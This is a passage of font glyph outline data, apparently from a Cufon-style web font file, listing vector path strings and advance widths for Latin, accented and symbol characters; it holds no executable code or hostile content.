,34,3,49,7r-6,23v-34,-13,-98,-11,-95,33v2,35,45,48,88,44r0,21v-54,-4,-98,7,-102,57v-5,61,73,58,104,77","w":167},{"d":"103,-246v-38,4,-50,21,-50,73r0,173r-25,0r0,-175v-2,-65,20,-91,74,-95v40,-3,71,26,70,64v-1,36,-24,54,-58,59v43,5,64,33,67,75v3,57,-59,96,-110,68r0,-23v39,23,85,0,85,-45v0,-40,-28,-61,-69,-61r0,-28v33,3,60,-16,60,-44v0,-23,-20,-43,-44,-41","w":199},{"d":"21,-129v-1,-102,103,-162,203,-124v19,8,39,21,57,38r-20,19v-24,-24,-58,-43,-98,-43v-64,0,-111,45,-115,109v-8,122,200,156,219,31r-82,0r0,-25r111,0v1,80,-52,129,-130,131v-80,2,-144,-58,-145,-136","w":313},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm110,-41v47,40,88,27,88,-44r0,-174r25,0r0,175v14,93,-72,114,-126,63","w":254},{"d":"18,-146v4,-55,72,-66,106,-24r-16,16v-21,-26,-62,-26,-68,7v7,45,84,41,84,96v0,59,-86,74,-115,29r16,-18v13,14,26,22,40,22v18,0,35,-14,35,-32v-4,-47,-86,-40,-82,-96xm81,-226r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":139},{"d":"20,-131v0,-99,109,-165,204,-120v19,10,36,23,48,40r-20,16v-20,-26,-51,-45,-93,-45v-65,0,-109,45,-112,112v-4,105,145,149,205,68r20,15v-24,30,-61,52,-113,52v-80,2,-139,-58,-139,-138xm171,-278r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":292},{"d":"66,-171r35,-22r0,24r-35,23r0,146r-24,0r0,-130r-33,21r0,-25r33,-21r0,-110r24,0r0,94","w":107},{"d":"154,-128v21,-1,21,-7,44,-19r0,28v-20,10,-25,15,-44,17v-22,3,-66,-28,-88,-28v-21,0,-26,7,-46,19r0,-29v20,-10,25,-14,44,-16v22,-2,65,29,90,28","w":218},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm107,-281r39,54r-25,0r-51,-54r37,0","w":235},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm106,-281r39,54r-25,0r-51,-54r37,0","w":233},{"d":"129,5v-35,-2,-59,-16,-77,-38r0,103r-24,0r0,-261r24,0r0,35v17,-23,40,-39,76,-40v54,-1,99,47,99,100v0,53,-45,102,-98,101xm202,-95v0,-45,-31,-76,-76,-77v-41,-1,-76,35,-76,77v0,46,33,77,77,77v43,0,75,-34,75,-77","w":245},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm106,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":233},{"d":"18,-94v0,-66,42,-93,105,-95r0,-45r33,0r0,45v61,0,103,32,103,93v0,69,-40,95,-104,99r0,65r-33,0r0,-66v-61,0,-104,-31,-104,-96xm122,-165v-46,0,-66,26,-67,71v0,48,22,73,67,73r0,-144xm156,-165r0,144v45,0,67,-25,67,-73v0,-47,-22,-70,-67,-71","w":277},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm-16,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm56,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":81},{"d":"95,-82v-15,46,-81,43,-84,-5v0,-18,11,-36,33,-54v31,-25,48,-50,52,-75v5,54,79,73,85,128v2,21,-18,41,-38,40v-18,0,-33,-12,-45,-34v-1,51,22,72,67,75r1,7r-140,0r2,-7v44,0,69,-29,67,-75","w":191},{"d":"46,7r162,-272r19,0r-162,272r-19,0xm14,-262r102,0r-83,136r-16,-7r68,-112r-71,0r0,-17xm240,-136v38,-4,62,46,25,63v47,18,23,76,-26,76v-49,0,-72,-58,-25,-76v-38,-18,-12,-67,26,-63xm214,-101v0,26,50,28,50,0v0,-13,-12,-18,-25,-18v-12,0,-25,7,-25,18xm207,-37v1,32,65,30,64,-1v0,-15,-14,-26,-31,-26v-17,0,-34,11,-33,27","w":299},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm61,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm133,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":233},{"d":"103,5v-47,0,-85,-38,-85,-85v0,-39,20,-65,60,-79v-55,-32,-23,-111,42,-111v15,0,29,2,42,5r-6,22v-33,-10,-85,-4,-82,32v3,32,17,37,54,49v90,30,70,167,-25,167xm163,-80v1,-32,-28,-62,-60,-62v-32,0,-61,30,-60,62v0,33,26,62,60,62v34,0,60,-29,60,-62","w":205},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm62,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm134,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":235},{"d":"32,0r0,-259r5,0r172,198r0,-198r26,0r0,259r-6,0r-171,-195r0,195r-26,0xm69,-302v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":266},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm112,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":245},{"d":"153,-265r6,0r0,180r31,0r0,25r-31,0r0,60r-26,0r0,-60r-124,0xm133,-85r0,-108r-76,108r76,0","w":199},{"d":"33,-42v26,33,59,34,73,-8r-94,-208r29,0r78,176r72,-177r28,0r-98,233v-20,47,-81,39,-107,0xm78,-320v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":232},{"d":"108,-265r25,0r0,335r-25,0r0,-335","w":241},{"d":"17,-194v0,-43,24,-72,72,-72r91,0r0,13r-15,0r0,294r-21,0r0,-294r-38,0r0,294r-21,0r0,-165v-46,0,-68,-26,-68,-70","w":203},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110","w":312},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84xm58,-268v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":193},{"d":"85,-173v0,-12,9,-22,21,-22v12,0,22,10,22,22v0,11,-10,21,-22,21v-12,0,-21,-9,-21,-21xm106,50v31,0,52,-19,52,-52r25,0v1,47,-31,77,-77,77v-41,0,-72,-24,-74,-61v-3,-63,99,-51,109,-97v0,-16,-17,-28,-36,-27v-26,0,-36,13,-38,38r-26,0v2,-38,25,-62,64,-62v35,0,62,20,62,51v3,64,-106,45,-109,97v-1,22,23,36,48,36","w":212},{"d":"108,5v-60,-2,-85,-34,-84,-104r0,-92r25,0v3,76,-19,172,59,172v43,0,63,-33,63,-77v0,-32,-15,-58,-45,-78r14,-22v82,37,74,205,-32,201xm51,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm123,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":214},{"d":"31,-259r26,0r0,109r132,0r0,-109r26,0r0,259r-26,0r0,-125r-132,0r0,125r-26,0r0,-259","w":245},{"d":"111,-270v-46,84,-50,251,-9,345r-27,0v-39,-94,-36,-257,8,-345r28,0","w":132},{"d":"213,-94v0,-97,-146,-139,-195,-58r20,13v37,-58,143,-33,150,29r-85,0r0,22r85,0v-3,70,-110,95,-150,37r-20,13v16,27,51,42,90,43v58,3,105,-45,105,-99","w":231},{"d":"273,-154v28,31,52,51,73,59r0,7v-22,10,-47,30,-73,60r-13,0v11,-24,22,-42,34,-54r-280,0r0,-18r280,0v-13,-16,-25,-34,-34,-54r13,0","w":360},{"d":"57,0r-26,0r0,-259r130,0r0,26r-104,0r0,233xm124,-333r38,0r-52,54r-24,0","w":166},{"d":"97,-141r0,-77r24,0r0,77r77,0r0,24r-77,0r0,76r-24,0r0,-76r-77,0r0,-24r77,0","w":218},{"d":"278,-145v-2,66,-31,86,-84,121r76,0r0,24r-99,0r0,-34v53,-38,77,-49,81,-110v3,-58,-43,-96,-101,-96v-58,0,-104,38,-101,96v3,61,27,72,80,110r0,34r-99,0r0,-24r76,0v-53,-36,-81,-54,-84,-121v-3,-72,56,-120,128,-120v72,0,130,49,127,120","w":301},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm107,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":235},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm145,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":312},{"d":"2,-191r25,0r58,139r62,-139r4,0r61,139r60,-139r26,0r-83,191r-5,0r-61,-137r-61,137r-5,0xm93,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm165,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":299},{"d":"83,-281r38,0r-52,54r-24,0xm139,-281r38,0r-52,54r-24,0","w":198},{"d":"107,-172v4,-56,97,-57,95,0v-1,36,-14,47,-37,78v-32,43,-53,75,-58,98v-12,-52,-61,-94,-90,-146v-18,-34,3,-74,39,-74v24,0,41,15,51,44","w":212},{"d":"33,-174v0,-12,9,-22,21,-22v12,0,23,9,22,22v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21xm33,-17v0,-12,10,-22,21,-22v12,0,22,10,22,22v0,12,-9,23,-22,22v-12,0,-21,-10,-21,-22","w":99},{"d":"24,-265r24,0r0,265r-24,0r0,-265","w":72},{"d":"16,-190v0,50,35,70,90,70r-93,120r32,0r93,-120r14,0r0,120r26,0r0,-259v-84,-2,-162,-5,-162,69xm43,-190v0,-49,56,-44,109,-43r0,88v-53,1,-109,5,-109,-45","w":210},{"d":"11,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124xm118,-333r38,0r-52,54r-24,0","w":213},{"d":"81,-212r35,0r0,35r-35,0r0,-35xm10,-141r178,0r0,24r-178,0r0,-24xm81,-82r35,0r0,36r-35,0r0,-36","w":197},{"d":"72,-265v33,0,61,28,61,60v0,33,-28,61,-61,61v-33,0,-61,-28,-61,-61v0,-33,28,-60,61,-60xm72,-163v21,0,40,-20,40,-41v0,-22,-18,-42,-39,-42v-22,0,-41,18,-41,41v0,22,18,42,40,42","w":143},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84","w":193},{"d":"24,-270r218,0r0,29r-174,0r107,140r-114,148r183,0r0,28r-223,0r0,-33r109,-142r-106,-139r0,-31"},{"d":"52,-170r0,170r-25,0r0,-191r97,0r0,21r-72,0","w":129},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm230,67v-49,16,-75,-43,-34,-67r19,0v-14,12,-21,23,-21,34v1,16,18,22,38,18","w":245},{"d":"98,7v-66,0,-87,-58,-87,-136v0,-79,19,-136,87,-136v68,0,90,59,90,136v0,77,-23,136,-90,136xm99,-240v-51,6,-63,48,-63,111v0,64,11,112,63,112v52,0,65,-55,65,-112v0,-59,-14,-107,-65,-111","w":199},{"d":"24,-265r24,0r0,265r-24,0r0,-265xm76,-183r-12,-7v6,-12,10,-23,11,-34r-14,0r0,-41r27,0v0,34,1,59,-12,82","w":74},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm168,-333r38,0r-52,54r-24,0","w":312},{"d":"29,-21r74,-170r13,0r73,170r23,0r0,45r-24,0r0,-24r-158,0r0,25r-24,0r0,-46r23,0xm109,-153r-56,132r109,0","w":217},{"d":"69,-191r-39,96r39,95r-26,0r-39,-95r39,-96r26,0xm149,-191r-39,96r39,95r-26,0r-39,-95r39,-96r26,0","w":152},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0","w":266},{"d":"184,-329r13,0r-55,343r-87,-180r-35,16r-6,-11r53,-27r71,145","w":197},{"d":"87,-160r0,-77r24,0r0,77r77,0r0,24r-77,0r0,76r-24,0r0,-76r-77,0r0,-24r77,0xm188,-28r0,24r-178,0r0,-24r178,0","w":197},{"w":100},{"d":"28,-270r240,0r0,345r-34,0r0,-314r-172,0r0,314r-34,0r0,-345","w":296},{"d":"127,-169r-14,-7v7,-17,11,-21,13,-41r-16,0r0,-48r32,0v0,41,1,70,-15,96xm49,-169r-14,-7v7,-17,11,-21,12,-41r-15,0r0,-48r32,0v0,41,1,70,-15,96","w":174},{"d":"18,-146v4,-55,72,-66,106,-24r-16,16v-21,-26,-62,-26,-68,7v7,45,84,41,84,96v0,59,-86,74,-115,29r16,-18v13,14,26,22,40,22v18,0,35,-14,35,-32v-4,-47,-86,-40,-82,-96","w":139},{"d":"159,-259r29,0r-73,130r63,0r0,20r-66,0r0,27r66,0r0,21r-66,0r0,61r-25,0r0,-61r-65,0r0,-21r65,0r0,-27r-65,0r0,-20r62,0r-73,-130r29,0r59,106","w":199},{"d":"20,-148v0,-59,49,-83,124,-78r0,-33r26,0r0,33v74,-4,123,17,123,78v0,58,-50,80,-123,74r0,74r-26,0r0,-74v-71,5,-124,-11,-124,-74xm266,-149v0,-46,-44,-55,-96,-52r0,102v51,4,96,-3,96,-50xm47,-149v-1,47,44,54,97,50r0,-102v-51,-3,-97,6,-97,52","w":313},{"d":"2,-191r25,0r58,139r62,-139r4,0r61,139r60,-139r26,0r-83,191r-5,0r-61,-137r-61,137r-5,0xm161,-281r38,0r-52,54r-24,0","w":299},{"d":"291,-196v55,-1,103,45,98,103r-171,0v-5,86,121,97,144,30r21,10v-20,35,-43,58,-92,58v-44,0,-66,-18,-86,-48v-20,28,-44,47,-86,48v-55,1,-99,-48,-99,-102v0,-54,45,-99,99,-99v41,0,67,19,86,50v19,-31,44,-49,86,-50xm193,-94v1,-42,-34,-79,-75,-78v-44,1,-74,33,-74,77v0,44,32,77,76,77v43,0,72,-32,73,-76xm362,-114v-7,-52,-77,-77,-119,-41v-11,9,-18,23,-23,41r142,0","w":409},{"d":"107,-240v-31,0,-52,19,-52,52r-25,0v-1,-47,31,-77,77,-77v62,0,97,63,52,102v-19,16,-88,25,-87,56v0,16,18,26,36,26v26,0,35,-13,38,-37r26,0v-2,38,-25,62,-64,62v-34,0,-62,-20,-62,-51v0,-65,106,-45,109,-97v1,-22,-23,-36,-48,-36xm85,-17v0,-12,10,-22,22,-22v11,0,21,10,21,22v0,12,-9,22,-21,22v-12,0,-23,-9,-22,-22","w":212},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm-28,-250v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":72},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm-16,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm56,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":81},{"d":"20,-131v0,-99,109,-165,204,-120v19,10,36,23,48,40r-20,16v-20,-26,-51,-45,-93,-45v-65,0,-109,45,-112,112v-4,105,145,149,205,68r20,15v-24,30,-61,52,-113,52v-80,2,-139,-58,-139,-138","w":292},{"d":"31,-259r27,0r0,97r103,-97r35,0r-124,116r134,143r-35,0r-113,-121r0,121r-27,0r0,-259","w":212},{"d":"303,-244r-125,249r-125,-249r250,0","w":356},{"d":"183,-168v0,45,-36,81,-79,83r0,65r73,0r0,9r-73,0r0,70r-10,0r0,-70r-73,0r0,-9r73,0r0,-65v-42,-2,-78,-37,-78,-83v0,-45,38,-84,83,-84v45,0,84,39,84,84xm99,-93v40,0,75,-35,75,-75v0,-40,-35,-75,-75,-75v-40,0,-75,35,-75,75v0,40,35,75,75,75","w":198},{"d":"260,-127r-263,0r0,-31r116,0r0,-170r31,0r0,170r116,0r0,31xm260,-60r-263,0r0,-31r263,0r0,31"},{"d":"113,-60r-116,0r0,-31r116,0r0,-36r-116,0r0,-31r116,0r0,-170r31,0r0,437r-31,0r0,-169"},{"d":"79,109r0,-203r-82,0r0,-31r82,0r0,-203r31,0r0,437r-31,0xm146,109r0,-437r31,0r0,437r-31,0"},{"d":"5,25v0,-65,101,-89,163,-54r-5,-241r10,0v25,14,96,77,100,105v0,4,-6,12,-10,12v-23,-15,-61,-60,-88,-74r4,242v0,80,-174,94,-174,10","w":277},{"d":"20,-180r178,0r0,24r-154,0r0,77r-24,0r0,-101","w":218},{"d":"26,-166r166,0r0,166r-166,0r0,-166","w":217},{"d":"7,0r0,-203r203,0r0,203r-203,0xm108,-24v41,0,78,-36,78,-77v0,-41,-37,-78,-78,-78v-41,0,-77,36,-77,78v0,42,36,77,77,77xm108,-166v34,0,64,30,64,65v0,34,-30,64,-64,64v-34,0,-64,-30,-64,-64v0,-34,30,-65,64,-65","w":216},{"d":"129,5v-36,-1,-59,-18,-76,-40r0,35r-24,0r0,-265r24,0r0,107v17,-23,41,-37,77,-38v54,-2,98,48,98,101v0,53,-45,101,-99,100xm52,-97v0,42,34,79,75,78v45,-1,76,-32,76,-77v0,-44,-31,-78,-75,-78v-44,0,-76,30,-76,77","w":245},{"d":"31,-259r26,0r0,234r100,0r0,25r-126,0r0,-259xm98,-162r-14,-7v7,-17,11,-21,13,-41r-16,0r0,-48r32,0v0,41,1,70,-15,96","w":166},{"d":"216,0r-211,0r110,-244xm174,-14r-70,-170r-77,170r147,0","w":220},{"d":"113,-172v-73,0,-61,94,-61,172r-25,0r0,-191r25,0r0,33v15,-22,34,-38,65,-38v35,1,51,18,61,46v13,-26,36,-45,70,-46v85,-1,62,111,65,196r-25,0v-7,-66,25,-173,-45,-172v-74,1,-60,94,-61,172r-24,0v-6,-66,23,-172,-45,-172","w":337},{"d":"27,-126v0,-54,67,-62,94,-17v23,-25,27,-41,58,-41v30,0,51,23,51,57v0,36,-20,59,-51,59v-31,0,-36,-17,-58,-41v-27,45,-94,37,-94,-17xm210,-125v0,-30,-27,-50,-50,-32v-6,4,-15,14,-27,31v16,21,20,38,46,38v19,0,31,-16,31,-37xm46,-126v5,38,44,32,63,0v-14,-28,-60,-41,-63,0"},{"d":"86,-257r8,0v9,21,29,45,59,71r0,14v-20,-8,-39,-19,-55,-34r0,230v16,-15,35,-26,55,-34r0,14v-30,26,-50,50,-59,71r-8,0v-9,-21,-29,-45,-59,-71r0,-14v20,8,38,19,54,34r0,-230v-16,15,-34,26,-54,34r0,-14v30,-26,50,-50,59,-71xm27,92r126,0r0,17r-126,0r0,-17","w":180},{"d":"86,-154r14,0v-9,20,-21,38,-34,54r280,0r0,18r-280,0v12,12,23,30,34,54r-13,0v-26,-30,-51,-50,-73,-60r0,-7v21,-8,44,-28,72,-59","w":360},{"d":"217,-106r0,19r-44,0r-13,87r-19,0r12,-87r-58,0r-13,87r-20,0r14,-87r-44,0r0,-19r47,0r9,-59r-45,0r0,-19r47,0r13,-82r18,0r-11,82r58,0r12,-82r20,0r-13,82r40,0r0,19r-42,0r-9,59r41,0xm165,-165r-58,0r-9,59r58,0","w":259},{"d":"21,-96v0,-96,129,-134,175,-60r0,-35r23,0r0,34v28,-47,109,-51,148,-10v18,20,28,44,28,74r-172,0v3,43,30,75,75,75v37,0,56,-17,70,-45r21,11v-20,62,-136,78,-170,18r0,34r-23,0r0,-35v-19,25,-40,39,-76,40v-53,1,-99,-47,-99,-101xm368,-114v-5,-60,-95,-77,-129,-31v-7,8,-12,19,-15,31r144,0xm197,-95v-1,-46,-30,-77,-76,-77v-43,0,-74,32,-75,76v-1,42,35,78,76,78v42,0,75,-35,75,-77","w":416},{"d":"95,-184r-18,0r7,-81r26,0xm27,-184r-19,0r8,-81r26,0","w":111},{"d":"187,-74v0,44,-37,75,-84,74r-71,0r0,-259v69,-3,134,0,134,64v0,26,-14,44,-33,54v32,11,54,28,54,67xm139,-195v1,-39,-40,-40,-82,-38r0,83v47,2,80,-5,82,-45xm160,-74v0,-47,-45,-52,-103,-50r0,99v55,2,103,-1,103,-49","w":206},{"d":"99,-184r-18,0r-4,-81r26,0xm31,-184r-19,0r-4,-81r26,0","w":111},{"d":"103,7v-57,0,-96,-57,-72,-113v24,-55,70,-108,101,-159r21,14r-70,106v53,-20,102,21,101,72v-1,47,-34,80,-81,80xm158,-73v0,-29,-25,-54,-54,-54v-30,0,-55,25,-55,54v0,29,26,54,55,54v28,0,54,-26,54,-54","w":199},{"d":"10,-202v-6,-51,60,-85,87,-43r0,-17r20,0r0,120r-20,0r0,-17v-27,41,-94,8,-87,-43xm98,-202v0,-23,-14,-44,-34,-44v-44,0,-44,88,0,88v20,0,34,-21,34,-44","w":132},{"d":"10,-202v0,-34,25,-63,56,-63v32,0,57,30,57,63v0,33,-24,62,-57,62v-33,0,-56,-28,-56,-62xm102,-202v0,-24,-15,-43,-36,-44v-45,0,-47,88,0,88v21,-1,36,-20,36,-44","w":132},{"d":"51,-249r255,127r-255,127r0,-254","w":356},{"d":"146,109r0,-437r31,0r0,437r-31,0xm80,109r0,-437r30,0r0,437r-30,0"},{"d":"151,-162v-1,-44,-2,-78,-36,-78v-17,0,-30,14,-40,40r-24,-11v13,-28,31,-51,63,-51v45,0,56,47,57,99v0,87,-32,162,-107,167v-34,2,-55,-26,-54,-61v3,-72,58,-105,141,-105xm41,-53v0,35,37,41,63,20v27,-22,41,-58,46,-107v-70,1,-109,28,-109,87","w":177},{"d":"177,-158r83,0r0,31r-114,0r0,-201r31,0r0,170xm79,-158r0,-170r31,0r0,201r-113,0r0,-31r82,0xm79,-60r-82,0r0,-31r113,0r0,200r-31,0r0,-169xm177,-60r0,169r-31,0r0,-200r114,0r0,31r-83,0"},{"d":"20,-131v0,-99,109,-165,204,-120v19,10,36,23,48,40r-20,16v-20,-26,-51,-45,-93,-45v-65,0,-109,45,-112,112v-4,105,145,149,205,68r20,15v-24,30,-61,52,-113,52v-80,2,-139,-58,-139,-138xm161,41v-2,-9,-13,-8,-23,-5r5,-36r15,0r-3,21v14,-4,26,6,27,18v-1,28,-43,34,-70,23r4,-13v15,5,44,9,45,-8","w":292},{"d":"55,-14v-79,-56,-19,-220,91,-176r23,-46r21,11r-23,45v8,5,15,11,20,17r-15,18v-5,-5,-10,-9,-16,-13r-70,134v32,13,52,4,80,-16r16,18v-24,22,-67,36,-107,20r-26,52r-21,-11xm134,-169v-74,-28,-121,80,-68,132","w":199},{"d":"16,-250v0,-11,9,-20,20,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-11,0,-20,-10,-20,-21xm24,-191r25,0r0,191r-25,0r0,-191","w":72},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm79,-320v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":235},{"d":"175,-197v0,29,-16,43,-37,55v28,15,48,31,49,68v0,48,-37,81,-88,81v-51,0,-87,-35,-87,-79v0,-36,21,-55,50,-70v-22,-11,-38,-29,-38,-56v0,-39,34,-67,77,-67v42,0,74,28,74,68xm149,-198v0,-23,-20,-42,-49,-42v-26,0,-49,18,-49,43v-1,23,26,46,50,45v26,-2,48,-19,48,-46xm161,-74v0,-29,-29,-55,-60,-55v-34,0,-64,27,-63,58v1,33,27,53,62,53v35,1,61,-24,61,-56","w":199},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm21,-298v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-20,-9,-20,-20","w":81},{"d":"0,0r167,-259r160,0r0,27r-122,0r0,79r122,0r0,26r-122,0r0,102r122,0r0,25r-148,0r0,-85r-94,0r-55,85r-30,0xm102,-109r77,0r0,-120xm228,-333r38,0r-52,54r-24,0","w":357},{"d":"146,-328r31,0r0,268r-180,0r0,-31r149,0r0,-237xm79,-158r0,-170r31,0r0,201r-113,0r0,-31r82,0"},{"d":"17,-259r26,0r53,187r74,-187r5,0r74,187r53,-187r27,0r-74,259r-5,0r-77,-196r-78,196r-5,0xm184,-333r38,0r-52,54r-24,0","w":345},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259","w":193},{"d":"130,-287v-12,2,-9,10,-9,31r0,347r-26,0r0,-319v-1,-40,18,-74,52,-77v26,-2,32,33,8,35v-14,1,-15,-15,-25,-17","w":216},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77","w":245},{"d":"21,-234r0,-25r137,0r-108,234r102,0r0,25r-142,0r109,-234r-98,0xm98,-278r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":172},{"d":"77,-172v-1,45,1,64,36,68r0,29v-39,0,-37,40,-36,80v1,55,-12,77,-66,74r0,-27v29,0,37,-5,36,-36v0,-63,1,-87,37,-106v-31,-16,-36,-31,-37,-79v0,-52,6,-60,-36,-62r0,-28v59,-2,67,25,66,87","w":126},{"d":"21,-129v-1,-102,103,-162,203,-124v19,8,39,21,57,38r-20,19v-24,-24,-58,-43,-98,-43v-64,0,-111,45,-115,109v-8,122,200,156,219,31r-82,0r0,-25r111,0v1,80,-52,129,-130,131v-80,2,-144,-58,-145,-136xm118,-320v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":313},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm133,-281r-5,60r-20,0r-5,-60r30,0","w":235},{"d":"31,39r-26,0r0,-63r21,0r102,-235r9,0r107,235r20,0r0,63r-25,0r0,-39r-208,0r0,39xm56,-24r157,0r-81,-181","w":269},{"d":"195,-190v0,50,-35,70,-90,70r93,120r-32,0r-93,-120r-14,0r0,120r-26,0r0,-259v84,-2,162,-5,162,69xm168,-190v0,-49,-56,-44,-109,-43r0,88v53,1,109,5,109,-45xm127,-333r38,0r-52,54r-24,0","w":218},{"d":"27,3r0,-14v20,9,38,22,54,35r0,-281r18,0r0,281v12,-12,30,-24,54,-35r0,14v-30,26,-49,50,-59,72r-9,0v-8,-21,-27,-44,-58,-72","w":180},{"d":"65,-265r14,8v-7,17,-11,21,-13,40r16,0r0,48r-32,0v0,-41,-1,-70,15,-96","w":126},{"d":"18,-94v0,-97,146,-139,195,-58r-20,13v-37,-58,-143,-33,-150,29r85,0r0,22r-85,0v3,70,110,95,150,37r20,13v-16,27,-51,42,-90,43v-58,3,-105,-45,-105,-99","w":231},{"d":"106,-239v-93,0,-57,143,-64,239r-19,0v4,-111,-26,-262,83,-262v108,0,80,145,83,262r-19,0v-7,-96,29,-239,-64,-239","w":211},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110","w":312},{"d":"84,-230v-5,-25,-47,-24,-54,3r-19,0v4,-51,91,-49,93,-2v0,10,-5,1